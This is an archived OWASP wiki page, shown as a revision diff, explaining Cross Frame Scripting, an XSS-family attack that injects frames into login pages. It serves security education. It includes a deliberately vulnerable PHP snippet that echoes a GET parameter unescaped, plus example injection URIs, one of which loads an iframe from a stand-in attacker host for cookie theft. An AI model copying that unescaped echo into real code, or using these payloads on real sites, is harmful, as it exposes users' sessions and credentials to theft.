This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "Cross Frame Scripting"
(New page: {{Template:Attack}} ==Description== Cross Frame Scripting (XFS) is an attack that belongs to the Cross Site Scripting family. The attacker using this technique injects code in a frame. Th...) |
m (→Categories) |
||
Line 55: | Line 55: | ||
==Categories== | ==Categories== | ||
− | [[ | + | [[Category:Injection]] |
Revision as of 22:41, 4 November 2007
- This is an Attack. To view all attacks, please see the Attack Category page.
Description
Cross Frame Scripting (XFS) is an attack that belongs to the Cross Site Scripting family. The attacker using this technique injects code in a frame. Thanks to the XFS attacks he's able to inject his own content to a log in form, which purpose is to authorize the valid user to his/her bank or auction account.
Examples
The attacker has found a website, which allows for variable manipulation. In addition variables are sended using GET or POST methods but they are not properly validated, e.g.:
cat greetz.php <?php print "Hello! Welcome to Hell!"; print $_GET['greetings']; ?>
If the attacker would write the following URI:
/greetz.php?greetings=<iframe src="http://my.evilsites.com/cookie_monster.php"></iframe>;
then the successful code injection attack would be conducted.
Another example is a simple Java Script nesting:
/greetz.php?greetings=<iframesrc=javascript:alert('0wn3d!');></iframe>
The attacker may merge the above examples with an appropriate frame attributes. After that it should be easier to adjust injected code to the original layout of the page, which is prone to a Cross Frame Scripting. This attack can also be successfully used to bypass limitations in e.g. E-kiosk, which provides Internet for a money or just to its extra functionality/areas.
References:
Related Threats
Related Attacks
Related Vulnerabilities
Related Countermeasures
Use whitelists and determine (whenever it's possible) the expected input data format.